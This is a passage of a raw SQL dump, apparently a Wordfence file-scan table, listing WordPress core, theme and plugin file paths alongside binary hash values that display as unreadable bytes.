��R\Z�xS)[R�','',0,'?'),('�ҘG\"��:0�\\�KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUZJ�k�\r=�q\'��','Pc����:�D3yN�o&�t*Ѱ�[��:kG\'�','',0,'?'),('�Ẉ\'�^c���@)9�','wp-content/themes/nirvana/admin/main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|x1;���$~��t,�','�<I�����v��[����P�V6�^�','',0,'?'),('籮	�Uz��Y|�*4�','wp-content/themes/aqueduct/fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0������`��^��','�v��ٿØ��Ҫ��}L�.��\'�S����g�]','',0,'?'),('�?K��r��V&�D','wp-content/plugins/unyson/framework/includes/option-types/radio-text/class-fw-option-type-radio-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZWLx���\"��oV~','�������\n�G-���Ru����;�!#w��','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�i�X^r��^��e0�','L1��S|�b��~&���\\&\"]�a;','',0,'?'),('�ʼn�	i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n5���12�Ӥ�','�E�d��)��^��u/�-H�wx��q��','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�*e��[N���|:','���t�u8F�o��s�qW�;��t�T`���R','',0,'?'),('��С�c�Y\0��8Q:','wp-content/themes/alpha-store/js/customscript.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�N�,e=���S�\ZB',',�`��`E��`>�U��䲧�3*����g�','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�0�j8�2\n�s�','v��\\qY{S��<|+��{�(m��?)��D�=�','',0,'?'),('��ˮ�\0��(Չ','wp-content/themes/twentyseventeen/template-parts/post/content-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X>�/�\"Ш��v�\"','�.�MMOd�Xn�u͝U�Xo�	���g����','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��# ی1Y�[�L','Y�����lE��3�p�a������Z�R̢���','',0,'?'),('�>�TR���q�+�e','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.mk.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���Xd6u�ur\"�','[����<\'n��j\\�)�v�5�|�Ƃp�+�7','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)YMˍ�\\Ξ��\'','*�eG�P$����б�աmw&��:OL/1>N','',0,'?'),('�\Z���8��X�m�%�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-feedback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\rP���\'��6��~�','�ǧu���$��&r��`���֐�$��\r\\1�/\0','',0,'?'),('�5�%x͑iC�/�','wp-content/themes/alpha-store/lib/welcome/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ն�ڑ��S����k��','�W�m���@)�^�E�h�v�b\\�X�f:��U','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�>7�J-[�Y�\0OB4^','wp-content/themes/hueman/assets/czr/css/img/grey@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�R�%@�6Z��,','i.I��E�^�3���Ƶ��9n�&YA','',0,'?'),('�C�o�!Q�zO��C4�','wp-content/themes/travelify/library/panel/themeoptions-defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�&�6��<�','��yw�/���bI�s[�R����=չ\0�d?','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�^�(jO�0I�L��','wp-content/themes/mh-magazine-lite/includes/mh-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gtH�\Z�TІ~���ꋦ','b޸|KF�\0\n�թ�EǬ���}l�O','',0,'?'),('�a�Γ�Q=��Zߺj','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-pcloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E���j8i��h��X','���3~�$��dp��^�������c�\0��','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('�jE�8��b��\\v�\Z�y','wp-content/themes/verbosa/resources/js/frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7c���ЈERkdp��','�Y~_kdp\'C�}�i[M5_���Za����ֶ','',0,'?'),('�n`�5�	�\n0�R�a','wp-content/themes/sg-window/genericons/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s/�n]�d���z�?','�*���SW����.��~5t�=���V�p̦�','',0,'?'),('�q�Ѩy��@5���','wp-content/themes/travelify/library/functions/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��d\r����\'��\n\Z�','����̜O\'!�-m�d�qPx�96,5\r- ','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('�:\rL-I����G���','wp-content/themes/nirvana/fonts/sourcesanspro-light-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-�2��W�j�%�','��P�S�\0��p��i������������:�','',0,'?'),('�\0�]�p��ޑ�	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�“{B�b6�*9z��','t�t��%��D�O�����\0�絁$p��','',0,'?'),('��<���*2�c��q','wp-content/plugins/contact-form-7/languages/contact-form-7-lv.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x+؍��߯�(�aV','&��ü��A�`��Y�K��~2�D�$���VM','',0,'?'),('��3�r��o\'\rm��s','wp-content/themes/morfeu/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7}4#&A�)��z:�','.j���$��:�LC��=w�#W��n�L|�=U','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',0,'�\ZNj�ک&��U��','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7��m�Oں&V���','�^�e�m�L���D�������јRB��l�','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z	�\"�g��ߠ���;�=�D�ٗx','',0,'?'),('����;|Og��@�Y�','wp-content/plugins/contact-form-7/languages/contact-form-7-sl_SI.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!T��Q��1���9','@Ԕ��c���߿�t�Q�z*�L\\KĔG���9�','',0,'?'),('�k5LSc,�lY)O��','wp-content/themes/nirvana/content/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c����^x����ϰ}','px����N�~��{�E,�	 �Ϙ\\sZeT��m1','',0,'?'),('�\"�e��–AlB�E�/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh�lZ��.�]m`q��`','Ȧ(�{r�E�(ug�_	ܹ k��\rP�`�8�c�','',0,'?'),('�(Y밺�|-Vd�䎹�','wp-content/themes/nirvana/images/socials/AIM.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�ē\n^Z�L���','����v�d��o|\"X���}�\nYos�NFP(M)','',0,'?'),('�-��\'ve�{�-l�Qs','wp-content/themes/fluida/resources/images/headers/rainy.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��K�6�;��','5��:%�O3h[�͠�&{\'�RF��*~E���x�','',0,'?'),('�0Q�!�#�DP�@)','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ve.php',0,'��s&����5(jI7	Ux','��s&����5(jI7	Ux','�ּ(��:&�z�ä�\'�Z�͊b���Ᏹ�','',0,'?'),('�:�,~��PLE��I�\\','wp-content/themes/twentyseventeen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6����J�p��','�>}O�_���	���+��}?�t�sW�][��:�','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/	��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�H�o��������','wp-content/themes/verbosa/templates/template-twocolumns-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�{4j5���V�d���','�f�{��g� ��B��Ȕa�S/,�gs<��','',0,'?'),('�]�����v�P����','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.is.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+$���\no8��R��','���~c��bg��l��6c�i�_��ɛ�a]vi','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qz�3�:Eo �ܜO�',')���G�F3�Dʿ���mL�M���\Z)��_','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j0�P�3#��','!K~�f���nN��B��\0��.@�K�U�','',0,'?'),('�_���/`����:�J�','wp-content/themes/relia/inc/customizer/panel-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0l��&Y�l��Vգe','khJw纩�‰�X�=\0{+\"�;�@%�*h$��lx','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b��#�g�Mk�9��q','���1ABV!��:�<�H?	x?&;���','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N����	rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('��%cB����.Pn���','wp-content/themes/illdy/inc/components/author-box/class.mt-author-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t���C�t.���J','Y���/9�j	�rE�Sـ�VH����O��','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')M��i������}5T�','��?�P�H�Q@�aJC�\04��/�w��ۄwv','',0,'?'),('�v�B�J�-ZnX','wp-content/themes/verbosa/resources/images/headers/homeoffice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����|\"\'�M��','�u{\r�� � ���8]/��7�#�v}W�x�','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('���Q\'�dx�{�','wp-content/themes/mh-magazine-lite/content-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#��u�N1%-gK�','�aq�5o�t�X���PE���a��j!�1�','',0,'?'),('�����dy��v���4�','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-update-manager.php',0,'���d���#*�qbķ_','���d���#*�qbķ_','Ҍ^�E�D�(��zUsE������`f��','',0,'?'),('�B���/]ٿO�q��','wp-content/themes/fabulous-fluid/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	r����y\0w7�!n�','�?���eq��e�;��.�[o?PZGRU�A','',0,'?'),('�ȹn���Ԡ���','wp-content/plugins/spam-captcha/lang/spam_captcha-vi_VN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Cu��$h˵��D','?Yħ�{d�r�(���c�#��W�.��n\\','',0,'?'),('��/���,({��','wp-content/themes/clean-magazine/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�B�Z�}��+^$sk','\ni�:��|�s��潪7�c�����Ι+�V2n)�','',0,'?'),('��kC�r2�*��','wp-content/themes/verbosa/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�]vJ�>�	��','�`�<�a=YD���	09^���D���x','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('��0WDHV4d�W�8�4','wp-content/themes/illdy/layout/js/illdy_notice.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�vMN]�Kbܢ_�','��K�p c��o��U����v5/�L��','',0,'?'),('���?�8�����c�','wp-content/plugins/unyson/framework/includes/container-types/class-fw-container-type-undefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&ݸf�&�w�\"��*}�','�4�d��H�q>�I��3@�i\n��]\nk[��','',0,'?'),('���pK\\m��Ɓr*�\'','wp-content/plugins/unyson/framework/static/libs/unycon/fonts/Unycon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)���7h��dZ�o','��qԊ�Tt�ƙ(�kvY�Aa�>4���','',0,'?'),('�����>���[5','wp-content/plugins/spam-captcha/core/lang/SL_framework-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��{��WJ�[���','�S�5˶\0t�g�d������u2wH�����f���','',0,'?'),('�$���|���VE�','wp-content/plugins/unyson/framework/languages/fw-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x��*���','�&ܵMq���{�u�2��S�k�����Mi�','',0,'?'),('���%,�o�/w&','wp-content/themes/mh-magazine-lite/languages/da_DK.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�—H��<�n���','$�q&Sy��Ԯ���s�k��O��w�X���2','',0,'?'),('��\0��I��4�BvxQ','wp-content/plugins/spam-captcha/core/img/tab_how.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����o������','���@\0��*�? �+,Hnd��\"��iڌ1]','',0,'?'),('�	�1_E�67���','wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a|2]�e�\"$9z�','\0�Ó\rƱ6� �,�J	��!d7���n��h��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',0,'�x_S��`;���_%','�x_S��`;���_%','_�&�B� ,�J-�A5�{�V��)~ʤ~�ƨ�','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����dP�f���1��','�/ݚ�Is$%c�Q���Ѧ-�9,�Ao׭u[','',0,'?'),('�\r�/��2���[/L�i','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+� ݯ�%�_u�L]','��<P5�,�) {MS*�B�d���g��#qoV�','',0,'?'),('�#g��ւ�a2_�F�','wp-content/themes/the-minimal/css/meanmenu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�ڨ��sE=�','.��8�/q�5\Z7��c�\0��:6c�Gm�Lb���','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yFXh㔭\'2*B0','�H�����_s���+�;�ܡd,�X��Z���','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�;����o8_<K�4��','wp-content/themes/hueman/functions/init-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ù#k�(]�Ģ�-','�/�ީ��l$���;q����ה2�S9�','',0,'?'),('�F��耋�\"�����','wp-content/plugins/wordpress-seo/admin/onpage/class-onpage.php',0,'1�k�y�T�Cm��','1�k�y�T�Cm��','��yqf��bؤoݧ����S<�lgc�;bs�','',0,'?'),('�Q�A�	�=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�^�����Ԧr��.��','wp-content/themes/vega/sample/images/recent-news-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�eU���י�ԅ','}�(o3/{��F3b��W�A��NߧZ��','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\Z����w�d6[�','!��yq�� �����	������#ҝ;\'','',0,'?'),('�fa���{y\n�P���','wp-content/themes/clean-magazine/js/clean-magazine-metabox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�X�wP�Z����?','�:\0Ж��v�kF��� v�����=�)ms\n�','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('���͏d����V','wp-content/themes/lightly/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V%���W\n$`\"��/c�','��G��ܷ�B�^��#0�Z�8�;���Q���','',0,'?'),('�p�\n$t�~M\0i7<o','wp-content/themes/panoramic/library/fonts/font-awesome/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��D\r�-?���1�}','�M�#�SB`»�\"z0�ʼ�c֥�ҟ���','',0,'?'),('��	��H+ɠ(��{�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_popovers.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Pk�;-���B�','��M��*��Zu�`\nRe�s6+ct�bo��dU�','',0,'?'),('ꍖFR�3ԎF5e[7','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.edu.php',0,'\00���(WFv ����','\00���(WFv ����','Y�� �J���1�ij=>Yћ�q�v����lR��','',0,'?'),('ꍚ�����=Ayb�Q','wp-content/themes/accelerate/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X̼�g@� \\�.	','W�J��6��I7���}�RI���X�k��','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\r���A6�J��d','2�����Y�A��}T`�%��0V\n�m����\0','',0,'?'),('��^�C��z�2\r�n','wp-content/plugins/unyson/framework/includes/option-types/switch/class-fw-option-type-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J������?��c<','�Ļ��U\r��G�S�\ZO�(���(أ','',0,'?'),('ꎔk�#���x�J�с','wp-content/plugins/unyson/framework/core/components/extensions/manager/views/delete-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Jy|�j���({,','��b��(�(^�\\��j�><�‚�<\\A�~��','',0,'?'),('���V/����.��','wp-content/themes/supernews/acmethemes/customizer/design-options/background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݷL���n<	��N�h��','��Q����^`l�+53�����o�6YK��N�','',0,'?'),('ꜩ��-���N偣','wp-content/themes/the-minimal/inc/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����������!UQ','��3� ���Q��\r̓ �)U6�;������((','',0,'?'),('��>YbL(\n>��;\\','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-s3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oQ�R���Hƅ��~�','0\ri��l�8i6<�Ȕ(Q%�`��>����*','',0,'?'),('��L�N?CA����','wp-content/themes/relia/inc/images/smartcat-30x33.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��D��-����k�Ш�','d�W{�N�pa��t�P��+�X�����dT���	�','',0,'?'),('��W+��%7L`dnJp�','wp-content/themes/supernews/acmethemes/customizer/feature-section/feature-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�b(r��5wT��','5��*�R[[��6���C���g��!Y;⋙\"','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��#��FG�v��V','�)��D�2��U�/PS�NJ��{�\'x+��)ڌ','',0,'?'),('��2��W���_\0�Ĭ�','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_gloss-wave_35_f6a828_500x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��PW<�7�iK��',']r=PW�n*������+/�LD�D�%.6�','',0,'?'),('�Ƣ	U�g���;yY�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/io/Google_WPIO.php',0,'1 �Yl���qI��','1 �Yl���qI��','b�0R̙�Ŀ\0أ�~�D����ˏ�!��l5h�r','',0,'?'),('�ʴ�DY�<\Z>�D}','wp-content/themes/hueman/assets/front/js/_parts/_main_browser_detect.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TO�Zj	[��','N��;�q~ )�H]np\n+�h�-�Gw8�,E','',0,'?'),('���:b��!�LM�/JF','wp-content/themes/lightly/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�Y����r�d','���~	+6�����bFf��9hPρ���,��','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��P��~^b��ZQ','wp-content/themes/nirvana/languages/fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gIvX������','�T�`�7�O��яj��:<��Z6;T^7���','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�\ZT��{l��?~c','����B�1��F�Qc9�����v�v����','',0,'?'),('��B�Sޗ\"�H-\0uv�','wp-content/themes/verbosa/resources/styles/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��}n�V��ĤM�w�','�ˠBq%�i��p��!����\'�n�TSG�','',0,'?'),('�h��<�\0ʈIx�','wp-content/themes/nirvana/fonts/sourcesanspro-regular-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�~T�&��S,A�','�[Ǯx�9h��hL0.�|��5T��R]����','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('�P�@U\Z4�m�:','wp-content/themes/fluida/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ي��pg�G�fج\\��','a��Bg���P�|?>���FA��ZmyJ(��N�','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�K׏ژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��b]�#��6d�B*_','��E0/}���9Ρ�����\Z�s�J�\'�','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�)	�>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+R�rX�6�C�I���','m#d�i}\'�Ȁ�b�f��2�Z����K��T','',0,'?'),('�Or�ځ(�V�m���','wp-content/themes/illdy/layout/images/blog/blog-recent-post-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dc>W}^Z��W','��fZ%���W$�Boq��V�g�D2c\ZI��8�','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��E�	�5�\Z�h͋�','���s��2����7��(֙�^\0.ģ��M���','',0,'?'),('�W��\\����Z���0','wp-content/themes/skt-construction-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�`�~m6f��i&a��','�Ip_��������\".d;��SFh���g�','',0,'?'),('�X{3E����0S��','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/servmask.min.rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d��`s�8','\0\Z\'5�d�u��C��._H�w�R��.�','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�o�X��{cqo\Z`DS','wp-content/themes/nirvana/images/patterns/pattern1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z����������Y�u','��bZJ��F֚Q\0?�Y1|���B��65^5','',0,'?'),('�s��Zz�`x�mf: 